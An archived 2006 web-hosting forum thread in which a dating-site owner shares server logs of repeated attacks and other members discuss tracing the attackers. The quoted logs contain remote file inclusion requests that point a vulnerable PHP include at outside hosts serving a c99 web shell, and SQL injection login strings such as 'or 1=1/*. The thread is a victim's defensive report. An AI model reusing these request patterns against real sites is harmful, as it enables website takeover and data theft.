ModMySite Support Forum  
Uptime verified by Wormly.com

Go Back   ModMySite Support Forum > aeWebWorks aeDating / BoonEx Dolphin Dating Script > Security / Server Administration

Security / Server Administration Security / server administration for aeWebWorks aeDating or BoonEx Dolphin Dating Script

Reply
 
LinkBack Thread Tools Display Modes
Old 10-22-2006   #1 (permalink)
ijk
 
Join Date: Apr 2005
Posts: 343
Default Repeated hack attempts hacker in this forum ?

Repeated hack attempts on my site below. I think this hacker might be a member of this forum

Quote:
88.226.41.159 - - [22/Oct/2006:08:45:17 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40
Quote:
88.229.187.108 - - [22/Oct/2006:10:07:52 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40
Quote:
88.224.236.46 - - [22/Oct/2006:10:48:52 -0500] "GET /inc/design.inc.php?dir[inc]=http://www.dogubey.by.ru/c99.txt? HTTP/1.1" 200 40

Quote:
85.96.132.92 - - [22/Oct/2006:10:59:15 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40


whats do the below lines mean
Code:
You must login or register to view the code on ModMySite.
__________________
AE Version 4.0 IQ

Last edited by ijk; 10-22-2006 at 11:49 AM.
ijk is offline   Reply With Quote
Old 10-22-2006   #2 (permalink)
Prometheus
Guest
 
Posts: n/a
Default

You can start by going to arin.net then do an nslookup etc etc and hunt them down...lol



Todd
  Reply With Quote
Old 10-22-2006   #3 (permalink)
ijk
 
Join Date: Apr 2005
Posts: 343
Default proxy

using proxies so whatever whois info is there is not going to be much help.

but they seems hell bent on a sunday evening on bringing my site down.
__________________
AE Version 4.0 IQ
ijk is offline   Reply With Quote
Old 10-23-2006   #4 (permalink)
Administrator
 
Smoge's Avatar
 
Join Date: Mar 2005
Posts: 5,603
Send a message via Skype™ to Smoge
Default

Quote:
Originally Posted by ijk
Repeated hack attempts on my site below. I think this hacker might be a member of this forum
I did some basic searches of the MMS userlog against those IP's - and did not find any usernames that look like they would be hackers - based on the list and the posts made by users, for example, in the 88. address space. And as you mentioned - the IPs shown in your logs could be proxied / faked anyways.

Smoge
__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.
Smoge is offline   Reply With Quote
Old 10-23-2006   #5 (permalink)
Administrator
 
Smoge's Avatar
 
Join Date: Mar 2005
Posts: 5,603
Send a message via Skype™ to Smoge
Default

Hmmm... there is perhaps one, mentioned by someone else by name - that is in that IP space, 88.229.XXX.XXX

Smoge
__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.
Smoge is offline   Reply With Quote
Old 10-23-2006   #6 (permalink)
ijk
 
Join Date: Apr 2005
Posts: 343
Default Sure

Pretty sure there is one here if not more.

More hack attempts.
Quote:
85.107.122.77 - - [23/Oct/2006:07:58:08 -0500] "GET //inc/design.inc.php?dir[inc]=http://www.korsans.by.ru/c99.txt? HTTP/1.1" 200 40
Quote:
88.229.206.183 - - [23/Oct/2006:06:49:32 -0500] "GET /inc/design.inc.php?dir[inc]=http://hometown.aol.com/yarivgiladi/musa.php? HTTP/1.1" 200 40
__________________
AE Version 4.0 IQ
ijk is offline   Reply With Quote
Old 10-23-2006   #7 (permalink)
ijk
 
Join Date: Apr 2005
Posts: 343
Default With love from russia

Or was it From Russia with love

Another attack, they seem to love me, what have I done wrong
Quote:
+----------------------+-----------------+---------------------+-----------------+------------+
| Name | Password | Login_Time | IP | Action |
+----------------------+-----------------+---------------------+-----------------+------------+
| aaaaa' | 1 | 2006-10-23 09:41:22 | 83.237.21.23 | Failed |
| admin | 'or 1=1/* | 2006-10-23 09:41:40 | 83.237.21.23 | Failed |
| 'or 1=1/* | 'or 1=1/* | 2006-10-23 09:41:48 | 83.237.21.23 | Failed |
| ; | 1 | 2006-10-23 09:42:03 | 83.237.21.23 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:24 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:25 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:28 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:28 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| 111-222-1933email@a | 111-222-1933ema | 2006-10-23 13:05:29 | 208.185.249.195 | Failed |
| | 'or 1=1/* | 'or 1=1/* | 2006-10-23 14:51:14 | 83.237.21.23 | Failed
Code:
You must login or register to view the code on ModMySite.
__________________
AE Version 4.0 IQ

Last edited by ijk; 10-23-2006 at 03:03 PM.
ijk is offline   Reply With Quote
Old 10-23-2006   #8 (permalink)
ijk
 
Join Date: Apr 2005
Posts: 343
Default 1000 plus login attempts

here are a selection of the choice few.
Code:
You must login or register to view the code on ModMySite.
After all that not one successful login.

Smoge has userlog been sanitized as these popups are a pain.

But this would be a great advert for the userlog. God knows how many people are unware of attacks on their site. And if successful attempts were made would be full unaware. This is a must have mod.
__________________
AE Version 4.0 IQ

Last edited by ijk; 10-23-2006 at 02:14 PM.
ijk is offline   Reply With Quote
Old 10-26-2006   #9 (permalink)
Administrator
 
Smoge's Avatar
 
Join Date: Mar 2005
Posts: 5,603
Send a message via Skype™ to Smoge
Default

Quote:
Originally Posted by ijk
Smoge has userlog been sanitized as these popups are a pain.

But this would be a great advert for the userlog. God knows how many people are unware of attacks on their site. And if successful attempts were made would be full unaware. This is a must have mod.
Hi,

Yes - we posted that fix here.

Smoge
__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.
Smoge is offline   Reply With Quote
Old 10-27-2006   #10 (permalink)
 
Join Date: Oct 2006
Posts: 25
Default

ijk,

It looks like You have been tested out with acunetix (a server security program that looks for the holes, open ports and other stuff that can give a hacker pretty good information about Your system)

Shit happens
baris is offline   Reply With Quote
Reply

Bookmarks


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
Hack Attempts sillywabbit Dolphin General Discussion v5.0 to v5.21 10 09-01-2006 10:48 AM
Rate.Php - HAck Attempts? Smoge Security / Server Administration 1 09-06-2005 01:57 PM


All times are GMT -5. The time now is 11:19 PM.


Powered by vBulletin® Version 3.7.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0 RC7
Contents Copyright 2003 to the End Of Time - ModMySite.Com